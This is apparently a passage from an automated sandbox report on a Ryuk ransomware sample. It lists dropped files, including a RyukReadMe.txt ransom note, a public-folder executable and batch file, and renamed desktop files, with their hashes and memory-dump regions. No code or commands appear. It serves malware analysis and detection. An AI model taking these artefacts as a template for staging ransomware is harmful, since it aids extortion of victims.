130219e620008bea7069a77547c7670f2fbc7817f0657de56887713320b0ff22

SHA512
e0d6138e83df97f9355648946769f0b5d5a510093a790309c17662e73bb64b6539782c52db0ceb42989d0a8e8ed648679cd368201d4ea4c832960a36d69a4b78

Download Submit
C:\USERS\ADMIN\DESKTOP\GETRESTART.3G2

Filesize
1.0MB

MD5
46516429f09fa567f284084448942a74

SHA1
eb640e015f1e22d08be402f04073dec58d9c5699

SHA256
e6cc96cf265f74639ae8724f715f9286fc6bdfc690ddcce9f6c9557e8a637984

SHA512
54b278a38e09dd5124c3aa509c1929de10c5a75b4f428b6d88106fcf169ac90bb90203aae24a5c016cf6ecefc25c4cad38755ab5c95a3a7229757bd6bd9b0567

Download Submit
C:\USERS\ADMIN\DESKTOP\INITIALIZEMOVE.MPEG

Filesize
553KB

MD5
dcc44d95119fdbd79f71cf8f4e6cda21

SHA1
180a23f18ac7ed28b4a6cfdff1e7916632202d1e

SHA256
a8f41684de62fc07a00cf987b7a70a106a2db02845c6ff6bed27fac3a46d323f

SHA512
b69badbae0991aea090afb21762bde07ad9acd17a9dc76f80f8fd07db81d4a2c42023a5f01faf1528aac30f1fa026db4205e34608e6b1dbd35e304324aa1c54d

Download Submit
C:\USERS\ADMIN\DESKTOP\PINGUNPROTECT.AU

Filesize
875KB

MD5
9844bdffe524ccfdef3c67f4d0f3a6af

SHA1
6fa3f1137c837bb8fe9aecb6d4cb70ec89d2afe3

SHA256
dcfbbf5e60f7bc672d8a80b55df3e870d07d351c52b25b93d7df73d7db0f13cb

SHA512
3c3bd9af0a32f8f831241ad556a753aa86e4dcbad12d6cfc9fbe6a843d0f408115fc2957dc42b270f7665ab7c22f9508485c18265c56fa9e19b3c28f1abd4dce

Download Submit
C:\USERS\ADMIN\DESKTOP\PROTECTUNINSTALL.DOCX

Filesize
1.1MB

MD5
7fc3a537bf898acd2ff54489161605c2

SHA1
6987a11022ddcaef21e260fdcbe5fdb339293521

SHA256
64cf819eca09f594742c6df1a2bb42667c8b2aa0ae81a0c5a10ce066ddfa9af8

SHA512
f22be901bb789f6c11d13b07704a6cda8141e8cdea04e00185b5d888f4fe7836adcaa5acb80a59daf5405fa41203b120fa8ddf0ad4f4e747f6471a862e8fd464

Download Submit
C:\USERS\ADMIN\DESKTOP\REMOVESPLIT.CFG

Filesize
645KB

MD5
44266e9f8503fa98cafe2106b910d84a

SHA1
840b600d64a2db6c01e9e975c73da3dceb71f6d8

SHA256
8c26860e041efc7517cfcac257a799286fdbcd09f7c52e4c4b3927ab843fc652

SHA512
ec9089e1aa32dcfe3252924c2cae1cd781e3cdef39ad2ecddf9ca8426477f77b16006274a1737c8b7928edccb5ab60e1e0a7350514faa3d7d16331a81f8554a8

Download Submit
C:\USERS\ADMIN\DESKTOP\REPAIRWAIT.AU

Filesize
1.8MB

MD5
98f3e1bc750b230e824739e2041c3be3

SHA1
e8ac6c6c7ef6ffe704c00808c79ad49649a87257

SHA256
6573ae0a8c5b0a5901a71d4b215837462408e94d0c4a52b5a16704bdeb66a9b2

SHA512
dc781ecfe4611be827d8528f8b7a947c64ec59a9e171368d9226fcce372dd8cae8a25d1a84dec1b61ad166c59dbdf76e0ec90003a7687a513f8a7b42e51f5f71

Download Submit
C:\USERS\ADMIN\DESKTOP\RESIZEEXPORT.MPEG3

Filesize
1.3MB

MD5
fda6095f19f808fef31152098e9a149f

SHA1
b8689ef9be555349ffef6beb745762e23abc3569

SHA256
93f10819c676a1f71ca47ecb5178932aae0bb28c35eb3ecf25c1b8a3ae11a37d

SHA512
b666045fe9a1dee7153c998ed766ffbe0627c0e12f7fc91c8aae5314820b4b15782e78b951ad81c7cec48fc7d1c64c799d9024610016da0051ed4873ce597bcd

Download Submit
C:\USERS\ADMIN\DESKTOP\RESUMETEST.DXF

Filesize
921KB

MD5
b70c9f16f0e258483cc0a4da7b5cb0dc

SHA1
9922e3fb1b447267fb97230d7d25511252d9c5f1

SHA256
46944eb89729fb0dbeffc7a0dccf3f9ad8bb0a1a91da83abaf3707664691d493

SHA512
914fae28c5498c5e641ee26616a686e357d571a929f28a661abc54becf11406d7645493a53f35ff8b8658d2c5f23d043fa309ddf216ddd7db371a44e8eadaae5

Download Submit
C:\USERS\ADMIN\DESKTOP\REVOKEFORMAT.JPEG

Filesize
967KB

MD5
226e26d9456ec21935d07dd1e28342d6

SHA1
f04d100ebb080c7b0662a4b6b780daeda38064a0

SHA256
5968a217fc700bcf7162cda8baf1a1858655aef031c2281068dedc269443c57b

SHA512
e5a482d1588e4012cf87010ec5c37234b232d3c5f310badfc772372a58ba4d865329481a0c74f4b98e67c79c349632d6dbde0a9763eac2198b9e46dec5a6a543

Download Submit
C:\USERS\ADMIN\DESKTOP\SENDPUBLISH.ASF

Filesize
1.1MB

MD5
53a644abeaa0f02797dc6564d4d07854

SHA1
675cc3d223aeb3b75b13a300d0ba6b09d96bb0aa

SHA256
a295c14fdf7ad6cd3d5c43efd6fc570a742da723a621e92b3fc4f04b2dc3ec5c

SHA512
4ba92d12ddeaf03bc4adc39ee1bc3d1917487b2363e3179401bf3c6a91f074812d3b04dd3c2cc5d146ef5320a6e377459e2344b0895a58f84d142c6add3dc3c6

Download Submit
C:\USERS\ADMIN\DESKTOP\STARTWRITE.JPG

Filesize
691KB

MD5
9a8c51a6b324c4638ff8c1e886767b63

SHA1
2c74f93bda56f6780d8e5c2b9b9a02f725b9d3ee

SHA256
40ca99d3e504a4b5039f31fd22f22b763c67718a61d035386e41989220ac04dd

SHA512
48d19a150dddbedd9c941a8801d11a7a372be1b17f6ff75c8049c6f2764f68317b4fb06893e32423147ea0d632880d6afb6d9716eb2e8643139e75a2011bbc22

Download Submit
C:\USERS\ADMIN\DESKTOP\SUBMITPUSH.MIDI

Filesize
1.2MB

MD5
42026715e4d2bc4165e2e068b163d881

SHA1
685d75abf4bb4d09b411bd14cc47300cea02f997

SHA256
34fc4e9be87fa94a57045a7ac061f6a76b430ca441174218f5c664651eb0bdf8

SHA512
fc5b7494df319fb91e641c0a1370824766ac53234b302ef6d6491093020c4df77e9a82d5256a26dc98b690a80e85a0f759c1400b1cc637b0114d03d7b01dba75

Download Submit
C:\USERS\ADMIN\DESKTOP\WATCHUNINSTALL.CAB

Filesize
737KB

MD5
397e728c8014ba115e02c518396bfbbf

SHA1
e4c61f47c6bd16c3fc6d26898faa3aaa3d8721d3

SHA256
a7a727afbcb27b1ecd28e7953debd1dc89239009922e91aea0e2c51c423dbaaa

SHA512
144a1b553833906ffdf17b9187ac4131765ba96fad5690a45f6192cbcfaf8678aa1750606600e0087aabb5f522264adfceea19a930164395c4faef0ada935182

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Filesize
754B

MD5
c00884ec78096b3cb4c1c2811e197580

SHA1
519d21817301e24126a328ed77e8dba37c35061d

SHA256
60b0b7295cfae0da6089ae8e102bee5196f8369c981e8ac662d716405701e6d9

SHA512
62c440de3bf1a7a9a25a7b6b087f818a7dc6a9afea6b30093f911c7caca68ed0ecb9f5d88b67adfa1780b9512db875bcde0f8a4e99b502bc00374287231e2faf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Filesize
690B

MD5
98760049c463bd0652d449b5d26a6266

SHA1
fc82611fd311340daa4bdc165b061473a179949f

SHA256
3fa4a426ad937e1160a010ddd9b1c7d4f2722b6da5952176a4481fa6a1631b3c

SHA512
6067fe881c4a9f48f8d63de0ddf59940430ef123557dc78805aa69c04a805d6341fef622568d94ca1fa2b709062cac18872d6bbdef5f08e5581ce72e56a92d39

Download Submit
C:\Users\Admin\AppData\Local\IconCache.db

Filesize
12KB

MD5
1290c869ffbfa02937d41a833d927460

SHA1
34ae0b1b4dcd1ff3780d124fcfb7076346e6a819

SHA256
88748ae61f2b7f22be569f3de46781f4c9ef48f54fcab8d928d9410cfb4ffb5b

SHA512
1048d11a840f4576e5bfdd09b4bb9aabe1239fb16fe653e9883ec40c3aec113f3964a8545a1451ecc430d63d68af45f616a1735a6c39504a961b2c84709e7dc5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Filesize
1022B

MD5
d6ca3ead4cd6a7bb9d3c59cd74ab4a29

SHA1
268ecc47735d0476553472a95a5e83dcc57e006c

SHA256
22f28f626014233f3d7661922005edebcfc7d6c1b555c2fb7d1ab73e9aca3c24

SHA512
7d4bd47bd9f54c3eed9589010549e4eeb0f02f37c4c2f76e537b00e80baea89302bc2fd5187f1347dda35bdea7e7de36638fdc682ba44d2ae0c65c73bd1224e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chk

Filesize
8KB

MD5
9b12ba732c2a905058f3a9492e5f9a91

SHA1
676f2de2cd4678eb4c8f94e2e6357a313fdbba40

SHA256
eba375bd20cfb7b6e979062d6ce1b23511da910fa8134a46a99d14d15eaac52f

SHA512
ce513eaaf1a7350a9059b1eeb9304c02e2896e2f3af5ad558d189e367e4cfe0afa136982b6b26a1d40f16d6ebb4e37ac918a7dc1383755558ef662a485fffb5d

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133802884074311335.txt

Filesize
75KB

MD5
11f30a3ed9e0e5a79b4d1a50d3e044cc

SHA1
24d33b745e9cf1b52aee9d1985dd5e785268218a

SHA256
bafeaad9c2652b45c68de07a5585cbb3e44c2a24996dc79ba0ff605ed0e8719f

SHA512
dce0109132a1906a442ed44653e3653a70ed2dff07addade0f1dd11bcf17d3854ba4cd688cf0bcbb02519a9ba2e97c0f08ba40c178912cabe8546f11c2c36d4e

Download Submit
C:\Users\Public\vVGbi.exe

Filesize
168KB

MD5
166686d538ec9a0e0550347149aac4cc

SHA1
e50b973d43a77d7a2c1bf56e22d64d168ee8c170

SHA256
1bbe96a888c6e3a52cdb0676f38a8a379a72e6f4ade58f101a0559c7ad6f99c7

SHA512
72dc38caa810a976a2497306a87e637ff9e47ca145ede2bdc0e3d687c1793df6b734538c22de37f45d74aaf7472e07fc11df399fef03bda203eb078188d37129

Download Submit
C:\users\Public\PUBLIC

Filesize
276B

MD5
2520beadff142483ff0135d20f80ad5b

SHA1
fe7e6ff0a792fa110b74842f3e47a27a46b3d483

SHA256
db9e8fd9b31b60bde269bfd14ad1d7bd60c41fe3c8c893682e06808195dfaf85

SHA512
bf780c565e0a9bb533b804e8985ef58abaa70a80b1a0d6bcc53c570374d47ed980ebaf43a79730b23ff2b9f281e5f9241c5a298356b8029f47d8622dc4cc91ac

Download Submit
C:\users\Public\UNIQUE_ID_DO_NOT_REMOVE

Filesize
1KB

MD5
9532ed8d551a4c09947d6b499a340802

SHA1
5b97021076eb27e4b2e512e4b034724818d84dec

SHA256
ff4fe2e5350398f34540548cdcc373e8777e4c28470424d84010ddfa2061eacf

SHA512
8aeaad79662a9c4ce4c77b2799ebaa5b74eba1a1d283ad6088cf09d5f8ab28b395e5810f6c89ebcd09c3896d70454468ca9206738db97c87ce5c6d8416259ecf

Download Submit
C:\users\Public\window.bat

Filesize
1KB

MD5
d2aba3e1af80edd77e206cd43cfd3129

SHA1
3116da65d097708fad63a3b73d1c39bffa94cb01

SHA256
8940135a58d28338ce4ea9b9933e6780507c56ab37a2f2e3a1a98c6564548a12

SHA512
0059bd4cc02c52a219a0a2e1836bf04c11e2693446648dd4d92a2f38ed060ecd6c0f835e542ff8cfef8903873c01b8de2b38ed6ed2131a131bdd17887c11d0ec

Download Submit
F:\RyukReadMe.txt

Filesize
1KB

MD5
c03e00c87643eb8a7003f8d4f316f07a

SHA1
aaa7c803c46cd29e2f3bf7e4fd175ab37c6a505f

SHA256
b26adbe1ce66ce56ca20e28d3e8c1bf6d810f8a7f3a1680760b7e16827a2f6e9

SHA512
fe378fea020670dee255cbafa3b7e97cab9ba0c7eef08083e7af5022515d073e932827a07caff9e2dee78fe765ea51f0ed2b8a601bf7febe353b472da674e14c

Download Submit
\??\c:\Program Files\BackupAssert.ram

Filesize
229KB

MD5
1d2f94ac885d65f67fe095d89a950fca

SHA1
b767fa2f00b490351e21beb78f267b2700dbe9af

SHA256
1f756300f3da2782459541f5f2559a7da292d39d6c4c05f4efb5131e942161a1

SHA512
7b845ef1c3b7c49ee2a133a5993e35a2a06474642f1a921bb3bc2d46ba5eb4273a5861437b8deacfa7fa257abafe545f5d23cb7d736fd8adfaddd833f893a73e

Download Submit
memory/2988-8-0x00007FF7EA390000-0x00007FF7EA3C5000-memory.dmp

Filesize
212KB

Download
memory/2988-36693-0x00007FF7EA390000-0x00007FF7EA3C5000-memory.dmp

Filesize
212KB

Download
memory/3780-36700-0x0000022315AC0000-0x0000022315AC1000-memory.dmp

Filesize
4KB

Download
memory/3780-36816-0x0000022318280000-0x0000022318288000-memory.dmp

Filesize
32KB

Download
memory/3780-36743-0x00000223140D0000-0x00000223140E0000-memory.dmp

Filesize
64KB

Download
memory/3780-36752-0x0000022315AC0000-0x0000022315AC8000-memory.dmp

Filesize
32KB

Download
memory/3780-36702-0x0000022315AC0000-0x0000022315AC8000-memory.dmp

Filesize
32KB

Download
memory/3780-36817-0x0000022318270000-0x0000022318271000-memory.dmp

Filesize
4KB

Download
memory/3780-36703-0x0000022315A70000-0x0000022315A71000-memory.dmp

Filesize
4KB

Download
memory/3780-36699-0x0000022315AD0000-0x0000022315AD8000-memory.dmp

Filesize
32KB

Download
memory/3780-36737-0x0000022314070000-0x0000022314080000-memory.dmp

Filesize
64KB

Download
memory/3780-36697-0x0000022318150000-0x0000022318151000-memory.dmp

Filesize
4KB

Download
memory/3780-36696-0x00000223181C0000-0x00000223181C8000-memory.dmp

Filesize
32KB

Download
memory/3884-97-0x00007FF7EA390000-0x00007FF7EA3C5000-memory.dmp

Filesize
212KB

Download
memory/4040-36694-0x00007FF7EA390000-0x00007FF7EA3C5000-memory.dmp

Filesize
212KB

Download
memory/5804-37113-0x0000000004460000-0x0000000004461000-memory.dmp

Filesize
4KB

Download
memory/9624-36825-0x0000000004C00000-0x0000000004C01000-memory.dmp

Filesize
4KB

Download
memory/12336-36971-0x0000000004630000-0x0000000004631000-memory.dmp

Filesize
4KB

Download
memory/12820-36977-0x000001A3F6A00000-0x000001A3F6A20000-memory.dmp

Filesize
128KB

Download
memory/12820-37007-0x000001A3F69C0000-0x000001A3F69E0000-memory.dmp

Filesize
128KB

Download
memory/12820-37008-0x000001A3F6DD0000-0x000001A3F6DF0000-memory.dmp

Filesize
128KB

Download
memory/12820-36974-0x000001A3F5900000-0x000001A3F5A00000-memory.dmp

Filesize
1024KB

Download
memory/15436-36826-0x000002BDAAE20000-0x000002BDAAF20000-memory.dmp

Filesize
1024KB

Download
memory/15436-36855-0x000002BDABE00000-0x000002BDABE20000-memory.dmp

Filesize
128KB

Download
memory/15436-36862-0x000002BDAC200000-0x000002BDAC220000-memory.dmp

Filesize
128KB

Download
memory/15436-36831-0x000002BDABE40000-0x000002BDABE60000-memory.dmp

Filesize
128KB

Download